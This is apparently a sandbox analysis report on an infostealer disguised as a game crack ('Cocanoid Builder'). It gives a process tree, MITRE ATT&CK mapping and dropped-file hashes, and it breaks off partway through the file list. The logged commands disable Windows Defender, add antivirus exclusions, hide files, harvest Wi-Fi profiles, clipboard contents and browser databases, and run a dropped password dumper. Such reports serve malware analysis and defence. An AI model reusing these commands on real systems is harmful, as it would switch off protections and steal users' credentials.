      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
    3⤵
    PID:5232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:5736
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:5856
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Кряк Nursultan Premium запущен! Наслаждайтесь игрой с Akrien beta!', 0, 'Celestial Reload', 64+0);close()""
    3⤵
    PID:5252
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Кряк Nursultan Premium запущен! Наслаждайтесь игрой с Akrien beta!', 0, 'Celestial Reload', 64+0);close()"
      4⤵
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
    3⤵
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe""
    3⤵
    PID:6076
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
    3⤵
    PID:6116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Unblock-File '.\getPass'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:5684
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5832
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:2620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
    3⤵
    PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3004
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4144
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5732
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net session"
    3⤵
    PID:5328
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:6124
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:6196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6168
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
    3⤵
    PID:6324
  - - C:\Windows\system32\where.exe
      where /r . *.sqlite
      4⤵
      PID:6572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
    3⤵
    PID:6344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:6508
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:6692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6620
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:6752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:6856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6760
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6900
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:6964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:7132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6972
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:7120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
    3⤵
    PID:7048
  - - C:\Users\Admin\AppData\Local\Temp\_MEI59602\getPass.exe
      getPass.exe /stext pass.txt
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:7156

C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe
"C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe"
1⤵
PID:6456
- C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe
  "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe"
  2⤵
  - Loads dropped DLL
  PID:5840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net session"
    3⤵
    PID:1252
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      PID:6624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:6880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\UPX.exe'"
    3⤵
    PID:5856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Unblock-File '.\UPX.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe'"
    3⤵
    PID:4076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
    3⤵
    PID:7064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:7048
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:1148
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:6196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:5708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:6372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Кряк Nursultan Premium запущен! Наслаждайтесь игрой с Akrien beta!', 0, 'Celestial Reload', 64+0);close()""
    3⤵
    PID:2860
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Кряк Nursultan Premium запущен! Наслаждайтесь игрой с Akrien beta!', 0, 'Celestial Reload', 64+0);close()"
      4⤵
      PID:4656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
    3⤵
    PID:1800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe""
    3⤵
    PID:6696
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\UPX.exe"
      4⤵
      Views/modifies file attributes
      PID:6420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
    3⤵
    PID:5000

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Cocanoid Builder\Cocanoid\Scripts\UPX\Eblan.txt
1⤵
PID:5940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1ac52e2503cc26baee4322f02f5b8d9c

SHA1
38e0cee911f5f2a24888a64780ffdf6fa72207c8

SHA256
f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4

SHA512
7670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b2a1398f937474c51a48b347387ee36a

SHA1
922a8567f09e68a04233e84e5919043034635949

SHA256
2dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6

SHA512
4a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
0d1ad492a2ce95932aa612eb04a5d3c8

SHA1
127a18f532154fb60840edf7ee71594aeeec2e93

SHA256
e624420ce50553062cac6ffd4ba2ba96825ca2ab21758085fb9ddc3dadfda48f

SHA512
b2af5117f47bc5aee3590ace5b0a3f476eb7d95adec097c321832b29330000608a3049247fa000010e76ff4193120dc9ceace3b156b1ffa08230c7f1f1412dc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
15KB

MD5
1edd996726f8a4d8df417e4d08e26e60

SHA1
a7b991a9eb0e8132ad0fa8ddfa1ed4dbda0f2ab9

SHA256
1d00d0b59e20ffb9a7ecc649ee1e3968f73e23fcff6237460070d314ef415e43

SHA512
c2943b01175c131036b1ae216aa9f136664ab9b5b829550ad29f8a0ee239120fce0ebf21a8558ac4869dd0141afec7b74fb922ddfcd7736222e3c626e4778880

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7fe9fdd91bd980b7b8d6ad55d9c3c043

SHA1
b5970fe2e179083571c1cbbfdfd193948b2cbf04

SHA256
04c0ff7cfb18aa8e7f1e61de9ddc9b32463bce69a01ab25838eda1985f2f0e79

SHA512
e3ef66cfd1a3bd95264afb53c5880bb96b483d31d12394885bb9beabc017c64a9f2e14597a04113b58dbcf1e7475821b024e72a270b4bb50e41f25e2f0a51027

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fd3135000b0216e3894066b57f009b28

SHA1
fbb03d251719309d9d4bfc0bad843dc52b41c05e

SHA256
6b125fdb1d18073a37e8f4b5f8903a79a1ad8c2907ed40b8ad28c6a422dacfe5

SHA512
1630ac18b2e46cf604e8ec46a5e3680cdd8d9da0693dd9b857c59202afa2a04fe6289aa5392fb67e63328d35f30c59e0bde82a9c9e0938d679e9030ff935cc85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ef2bfa2bfc568e4708a60b8e1f1a17be

SHA1
16ae85268e599540a8082eeb1cdeafb91fdaa63b

SHA256
81cfdf7fd36693e6405acfd579ff5b30616ecd140041bcc2904093c71437da1e

SHA512
34a91fd238eee26441248f11d3e8b5ee2c2b702e8a06794bb587a0097b2d13aadeaf667d515af672586e0652513284ff9c09dec6ac5b90aaccb10f2901a2a7d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9e90fa6f2caa052db84f352070693074

SHA1
a6c91a5432939c2e8af68384f7d426f2c58feb5f

SHA256
fa1e67b47d7788c7e8861c9d80d7d2280ef358d4eac453a944b0707cbe996b98

SHA512
5248c1284bc53043522428bac469bb70cbc81aa2601f8473513ce70afc7630f8bcada9a396999b7fa8dcfee90221de83a4976a1b6a7f19e1c6f6347b15ccf53c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
725d1601bf03c6e58a409299578d1f5b

SHA1
1e22c1262e4e52a6ba720123d46248682044287b

SHA256
27d15cad8a8cd92cf33575cac1a4ff1ea14c749413049c077572d676a0a1ebde

SHA512
29d6b8960efdc22a590b1512bb81ca4d58f9eb15f722fff5fa16a95a44c4c7802e82b9123eb2b24cae0441968e11f588556a2ee7aa2f08dab347604ddb61956e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4610b46cea5d37b77ad9269c772d450d

SHA1
d49559bc41b0c98009a54b2e0e4903605307a8f7

SHA256
8e15fbf3a7fc4148851d683d425123d6f99061a3c86816f1c4141c3ea29ab7ab

SHA512
93b91833d9bf1f0b88cd9a3cfb2df0fbf0e034d85d20fcb5c08969c3cdb52518d2bcfcf202b89ddbf9a02b7d7bc2cecbd61adc7628820b93384c516165ff15f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\PIL\_imaging.cp310-win_amd64.pyd

Filesize
730KB

MD5
7f75712c92974c6e050ac917928e4332

SHA1
215ac20383dfcbef9954572782a3e90ceb6e5780

SHA256
537e30e1437da489767a609a5ec6a5ce1f91ff9caca6c4ed3165749a83599ac5

SHA512
c44a067d5b7c4fbc169feffd86f4526a2b928f43372021079e2f12c6d85e34b249a50f3b732c3196bdb2150159c08f0f2043f6ea6bac69e371816ea63c52b707

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_bz2.pyd

Filesize
46KB

MD5
f5f4d231a7c611f417d4541c1aae4c10

SHA1
f0c7b2073568bd1b4d4a68c68e397d1c4c0de5d4

SHA256
fe3ececf82cdd471e61ac61923b7ecf9cf4df8f3a1116e8cf3a282d8d065df3a

SHA512
a31075c212f26f8be0598aecf44f936cf507f229c500f823951cd902fe03c2dc8cf66295a823c463299bae6a52117feb45dda1983ab0867df148daf327403fec

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_decimal.pyd

Filesize
104KB

MD5
a9a646fa30723fd915b7d9845c94ca5c

SHA1
980b3a54b18b1f1d88b4262248591e3e110cb057

SHA256
40d1ff3d77261c9c89afc98d4b7125e63e366be9340f1ce658cac1c1be774054

SHA512
00a2a0fe03e60599556aa145f1f5aff7fff424229108498eb853283a45c4e9f0c1cbc7f20f91722c64f48f8071d73c8bd9c758b42c534a143500f51733bf7841

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_hashlib.pyd

Filesize
33KB

MD5
ed2f19b39c926534a3f66804a72b0d53

SHA1
fca2296347f7dcd436a286f1e908988b0c43d2d5

SHA256
ebb44a13a343af88883fe3048437c7c6934f22126129086f6e386eaf59b746b8

SHA512
a3b5e39227f912b199b6332484a64dc83745768362a1e8c790396c50dae8fc51350263e7f4349595ed774f48f9e3e3cf57cef4de91348f1701d4fcd0a01ccee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_lzma.pyd

Filesize
84KB

MD5
5aec5d1bd3108bf7cd556ac901389b8c

SHA1
7e09948cabbb4b4af1bf1c72d8c7aa3afc23183e

SHA256
b3522206bf15f7fb7f649c8e1e8edbb1a0b58bce997d4f88d0878ca77c85d12e

SHA512
4a8c47f17d2799080e9acc1c99ca8706b8cc29ab6e91ee7d9c7a0b5ff0f191311ba4a5963a7f4b5ef0038076ad5830e4347b475dbccab3939f8a6e0c1cd8e4be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_queue.pyd

Filesize
24KB

MD5
ed684af77b17b6166ea94cb4c9831908

SHA1
db77252fd37079020b4fee9d68ea1fabf900b06c

SHA256
93104cd9274050d69ab7c1d1fbfc847e07a1faf9d392f5b46b2e40f1dca9bcf4

SHA512
306bb228d9cf4f9aafaf8c6e10fb5ee60fc21e8f7b05d43dab4e82c2d0852ab5d6d266303cebc51d75557aea09e30386a6197ad8b09f9f02b5d5715411feb499

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_socket.pyd

Filesize
41KB

MD5
83fa71bcfcdd78e9b21e4c002af9db47

SHA1
7bb246c21fac4d125942c0b017763595e475936b

SHA256
7d16e42e65c99fe3ae755045c1e4abd049bfd7e6f4ee7f366b776b365d82f2a2

SHA512
f02209e669cd0fe72cd2d8060f34a1ad559413179acab80769db026203b614b8b3415612831f89c11bd86bd00dbd91f8b04fd6d4f276311f09ba0877e6bc81cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_sqlite3.pyd

Filesize
48KB

MD5
bc8a7ed0a49a3c7cfee84692b236914b

SHA1
ba4a07b4d3f303a90a60bc8b9cfc0984fb14f32b

SHA256
4c4556f046de77ec05804eb54c3ef15d5b284d360199432379a3b87b25dba2fd

SHA512
587ff5b6777c663ae5a08fc73ffc46ef5bcff25d35b39c16f94bc4ec6f21f0b18840b6c49d83e5e99d2d550bcdafe00e981f2b5ee2e7309384728b1a66b5a789

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\_ssl.pyd

Filesize
60KB

MD5
91bcf19bbbfdc276520072f276eef11e

SHA1
3627bffb0cfa326609b16cb0d4effc5fcdf06025

SHA256
b89b461de18660dd2ab94ab271833894c8a518252b2002096ef8eea8ee07168d

SHA512
06498e9ca0169e02d65823498b5bd7478a630c3fde23acf11fee94947d703c72b2ce1531b5c46cdaa95b93c66b9c314113dd348f8c37eda84510a4078a27a2b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\base_library.zip

Filesize
1.0MB

MD5
fb815380fe9eb72d315fa3170dc7a043

SHA1
4f9ef6f72989d64652cf3940f43d2d5b97a77bd6

SHA256
66316182c89ad794371fa191fd654ad9d51c0451af74371037a8968eb7175c71

SHA512
ec41d4cd1b6e884ba356259217ec19c1be37b24d8acf6671e192d356f7cb38644edcafccc8b63cf857ab7b41e15d0aee98b4c83ea9c8d00da0e941b070ddb1a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI59602\config.json

Filesize
513B

MD5
